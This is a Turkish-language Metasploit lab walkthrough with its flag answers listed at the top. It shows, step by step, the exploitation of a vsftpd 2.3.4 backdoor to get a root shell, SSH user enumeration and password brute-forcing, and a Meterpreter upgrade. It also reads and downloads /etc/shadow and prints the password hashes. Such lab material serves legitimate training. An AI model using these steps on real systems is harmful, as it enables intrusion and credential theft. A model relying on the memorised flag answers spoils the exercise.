# Pwn with Metasploit


**Flags**:
- FTP sunucusunu ele geçirin ve /flag.txt'i okuyun.
   - answer: **CyberPath{KY7Sh7dN8f4vz4cf}**
- SSH sunucusunu ele geçirin ve /flag.txt'i okuyun.
   - answer: **CyberPath{r9UkdFV52x9Cd9KQ}**


### 0 - Metasploit'e Giriş:


Metasploit Projesi, güvenlik açıkları hakkında bilgi sağlayan ve sızma testi ve IDS imzası geliştirmeye yardımcı olan bir bilgisayar güvenlik projesidir. Boston, Massachusetts merkezli güvenlik şirketi Rapid7'ye aittir.

Metasploit, içinde kullanacağınız araçların çoğunu oluşturan altı çekirdek modülden oluşur. Bu laboratuvarda Exploit ve Auxiliary modüllerini kullanacağız.

![firefox](arc.jpg)

**- msfconsole:**

`msfconsole` komutu ile metasploit konsolunu başlatabilirsiniz.
- `msfconsole -h` komutu ile isteğe bağlı argümanları görebilirsiniz.
- msfconsole'da başlatma başlığını görmek istemiyorsanız, msfconsole'u `msfconsole -q` komutu ile çalıştırın.
msfconsole'da `help` komutunu deneyin. Başlamak kafa karıştırıcı olsa bile tamamını okumanızı şiddetle tavsiye ederim.

**msfconsole'da Tab Completion:**

Diğer modern konsollar gibi msfconsole özelliklerini hızlı kullanmanız için tasarlanmıştır. Geniş modül yelpazesi mevcut olduğundan, kullanmak istediğiniz belirli modülün adlarını ve yolunu hatırlamak zor olabilir. Sadece bildiğinizi girip `TAB` tuşuna basmak size mevcut seçeneklerin bir listesini sunacak veya sadece bir seçenek varsa diziyi otomatik olarak tamamlayacaktır. Hadi deneyelim;
- Bu komutu msfconsole `use exploit/windows/smb` içine yazın. `<number> kullan' ile exploit'i kolayca seçebilirsiniz.

#### - Exploits:

**Aktif Exploits:**

Active Exploitler bir ana bilgisayardan yararlanır, tamamlanana veya başarısız olana kadar çalışır ve ardından çıkar.
- Brute Force modülleri hedef sunucudan reverse shell açıldığında çıkacaktır.
- Bir hata meydana gelirse modül yürütmesi durur.

**Pasif Exploits:**
Pasif Exploitler, gelen ana bilgisayarları bekleyecek ve bağlanırken onlardan yararlanacaktır.
- Pasif Exploitler genellikle web tarayıcıları, FTP istemcileri vb. gibi istemcilere odaklanır.

**msfconsole'da Exploitleri Kullanmak:**

İlk önce kurban için istismar bulmanız, metasploit'te arama yapmanız gerekir. Örneğin `VSFTPD v2.3.4` çalıştıran sistemi kullanacağız. `exploit/unix/ftp/vsftpd_234_backdoor`

```
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor 
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads 

Compatible Payloads
===================

   #  Name                       Disclosure Date  Rank    Check  Description
   -  ----                       ---------------  ----    -----  -----------
   0  payload/cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options 

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 10.0.0.10
rhost => 10.0.0.10
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
```

### 1 - Metasploit ile Sunucuları Ele Geçirin:

Ağdaki tüm bilgisayarları Nmap ile buluyoruz ve vuln taraması ile Metasploit ile iki sunucunun sömürülebilir olduğunu biliyoruz. Hangisi VSFTPD sunucusu ve OpenSSH sunucusudur. VSFTPD sunucusunu Metasploit ile kıralım!

Uygulamada açık varsa, google'da uygulama ve sürüm arayabilirsiniz. Bu arama ile uygulama için rapid7 kullanım kılavuzunu bulabilirsiniz.

![firefox](google.PNG)

![firefox](rapid7.PNG)

Şimdi FTP Sunucsunu Ele Geçirme Zamanı!


```
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor 
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set target 0
target => 0
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options 

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 10.0.0.15
rhost => 10.0.0.15
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit 

[*] 10.0.0.15:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.0.0.15:21 - USER: 331 Please specify the password.
[+] 10.0.0.15:21 - Backdoor service has been spawned, handling...
[+] 10.0.0.15:21 - UID: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
[*] Found shell.
[*] Command shell session 1 opened (10.0.0.3:43423 -> 10.0.0.15:6200) at 2021-10-31 08:43:00 +0000


whoami
root
```

Metasploit bize root yetkisiyle reverse shell verdi. flag.txt dosyasını okuyun ve flagi alın!


### 2 - Metasploit ile server'ı enum etmek ve ele geçirmek:

Ağda bir SSH sunucusu olan başka bir savunmasız makinemiz var. Nmap taramasından, SSH sunucusunun openSSH v7.7 çalıştırdığını biliyoruz. Google aramadan, OpenSSH'nin bu sürümünün Kullanıcı Numaralandırmasına karşı savunmasız olduğunu öğrenebiliriz. Kullanıcı adını öğrenebilirsek, sunucuya kolayca kaba kuvvet uygularız. Elbette kullanıcı adını bilmeden kaba kuvvet uygulayabiliriz. Ancak bunun için Hydra her kullanıcı için tüm şifreleri deneyecek ve bu yöntem çok fazla zaman alacaktır.

```
msf6 > use auxiliary/scanner/ssh/ssh_enumusers 
msf6 auxiliary(scanner/ssh/ssh_enumusers) > show options 

Module options (auxiliary/scanner/ssh/ssh_enumusers):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CHECK_FALSE  false            no        Check for false positives (random username)
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        22               yes       The target port
   THREADS      1                yes       The number of concurrent threads (max one per host)
   THRESHOLD    10               yes       Amount of seconds needed before a user is considered found (timing attack only)
   USERNAME                      no        Single username to test (username spray)
   USER_FILE                     no        File containing usernames, one per line


Auxiliary action:

   Name              Description
   ----              -----------
   Malformed Packet  Use a malformed packet


msf6 auxiliary(scanner/ssh/ssh_enumusers) > set rhost 10.0.0.23
rhost => 10.0.0.23
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set user_file usernames.txt
user_file => usernames.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 10.0.0.23:22 - SSH - Using malformed packet technique
[*] 10.0.0.23:22 - SSH - Starting scan
[+] 10.0.0.23:22 - SSH - User 'abbey' found
[+] 10.0.0.23:22 - SSH - User 'abbey' found

```


Başarılı! Metasploit "abbey" kullanıcısını buldu. Parola için kaba kuvvet kullanma zamanı. Bunun için THC-Hydra kullanabiliriz. Ancak Metasploit'i kaba kuvvet için de kullanabiliriz. Yardımcı modül ssh_login scriptine sahiptir. `use yardımcı/tarayıcı/ssh/ssh_login` ile ayarlayabilirsiniz. Kelime listesi için passwords.txt kullanın.


```
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > show options 

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts

msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 10.0.0.23
rhosts => 10.0.0.23
msf6 auxiliary(scanner/ssh/ssh_login) > set username abbey
username => abbey
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file passwords.txt
pass_file => passwords.txt
msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 10.0.0.23:22 - Starting bruteforce
[+] 10.0.0.23:22 - Success: 'abbey:eagle' 'uid=1000(abbey) gid=1000(abbey) groups=1000(abbey) Linux 8baeac7b1e2d 5.10.16.3-microsoft-standard-WSL2 #1 SMP Fri Apr 2 22:23:49 UTC 2021 x86_64 GNU/Linux '
[*] Command shell session 1 opened (10.0.0.3:35431 -> 10.0.0.23:22) at 2021-10-31 09:51:22 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

```

Başarılı! Metasploit şifreyi buldu. Ve bir oturum açtı. Reverse Shell'e erişmek için `sessions -i <session_number>` komutunu kullanın. Artık komutları uzak makinede çalıştırabilirsiniz. Bu sistemde, sudo erişimimiz yok. /etc/passwd ve /etc/shadow'u okumaya çalışın. Bunları sunucuda eksik yapılandırma ile okuyabilirsek, root şifresini kırabilir ve ayrıcalık yükseltme için kullanabiliriz.

```
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
abbey:x:1000:1000::/home/abbey:/bin/sh
cat /etc/shadow
root:$6$fPX0MgCR$Xz66tc5/ae/ihKgiAcOTItd0cFa/1D3BoY7JwzTtFYSwnDajAYuqpTwIIj/Kd1H2uVSMmGXUCkq6fl/H24oLN.:18913:0:99999:7:::
daemon:*:17728:0:99999:7:::
bin:*:17728:0:99999:7:::
sys:*:17728:0:99999:7:::
sync:*:17728:0:99999:7:::
games:*:17728:0:99999:7:::
man:*:17728:0:99999:7:::
lp:*:17728:0:99999:7:::
mail:*:17728:0:99999:7:::
news:*:17728:0:99999:7:::
uucp:*:17728:0:99999:7:::
proxy:*:17728:0:99999:7:::
www-data:*:17728:0:99999:7:::
backup:*:17728:0:99999:7:::
list:*:17728:0:99999:7:::
irc:*:17728:0:99999:7:::
gnats:*:17728:0:99999:7:::
nobody:*:17728:0:99999:7:::
_apt:*:17728:0:99999:7:::
sshd:*:17729:0:99999:7:::
abbey:$6$X0xkHZyM$c/.HQf6FoLcmF7JE19oEok1XCoENiZ4IIWyk88KJykDYqqfQvyTgK1YKE9Ml7Cj3bF6fUnMklY0WzEgzg4v57/:18913:0:99999:7:::

```

### 3 - meterpreter ile Post Explotation:


Metasploit'in en güzel özelliklerinden biri, sömürü sonrası faaliyetler için araç cephaneliğidir. Meterpreter, bu görevi daha hızlı ve kolay hale getirmek için metasploit içinde geliştirilmiştir.
Önceki iki denememizde metasploit bizim için aptal bir kabuk açtı. Yorumlayıcı oturumu için 'oturumlar <session_number> yerine 'sessions -u <session_number>' kullanmanız gerekir. Ve `oturumlar <session_number>` ile yeni oturuma geçin.


```
msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 10.0.0.23:22 - Starting bruteforce
[+] 10.0.0.23:22 - Success: 'abbey:eagle' 'uid=1000(abbey) gid=1000(abbey) groups=1000(abbey) Linux 8baeac7b1e2d 5.10.16.3-microsoft-standard-WSL2 #1 SMP Fri Apr 2 22:23:49 UTC 2021 x86_64 GNU/Linux '
[*] Command shell session 3 opened (10.0.0.3:45413 -> 10.0.0.23:22) at 2021-10-31 10:04:04 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -u 3
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [3]

[*] Upgrading session ID: 3
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.0.0.3:4433 
[*] Sending stage (984904 bytes) to 10.0.0.23
[*] Meterpreter session 4 opened (10.0.0.3:4433 -> 10.0.0.23:46284) at 2021-10-31 10:04:20 +0000
[*] Command stager progress: 100.00% (773/773 bytes)
msf6 auxiliary(scanner/ssh/ssh_login) > sessions 4
[*] Starting interaction with 4...

meterpreter >

```

Artık meterpreter oturumumuz var! Meterpreter'de `help` komutunu kullanabilirsiniz. Help komutu, meterpreter oturumunda mevcut komutları listeler. Bu bölümde, kullanım sonrası ve sızma testi için oldukça önemli olan meterpreter paketinin komutlarını tartışıyor olacağız.

- **Shell almak**: 
Shell için `shell` komutunu çalıştırabilirsiniz. Linux'ta çoğunlukla sh açılacaktır. Windows'ta CMD'yi açar.
- **Present working directory, Process id ve User id bilgilerini almak:**
Try `getuid`, `pwd`, and `ps` commands. 
- **meterpreter ile dosyaları sistemimize indirmek**:
Şifre kırmak için /etc/shadow ve /etc/passwd dosyasına ihtiyacımız var. Meterpreter ile makinemize indirebiliriz.

```
[*] Downloading: /etc/passwd -> /home/attacker/passwd
[*] Downloaded 1011.00 B of 1011.00 B (100.0%): /etc/passwd -> /home/attacker/passwd
[*] download   : /etc/passwd -> /home/attacker/passwd
meterpreter > download /etc/shadow .
[*] Downloading: /etc/shadow -> /home/attacker/shadow
[*] Downloaded 748.00 B of 748.00 B (100.0%): /etc/shadow -> /home/attacker/shadow
[*] download   : /etc/shadow -> /home/attacker/shadow

```

Meterpreter ile RDP, Pivoting ve diğer laboratuvarlarda öğreneceğimiz çok daha fazlasını uzaktan yapabilirsiniz.


**Yapılacaklar:**
- Şimdi indirdiğimiz şifreleri John İle Kırma Zamanı!
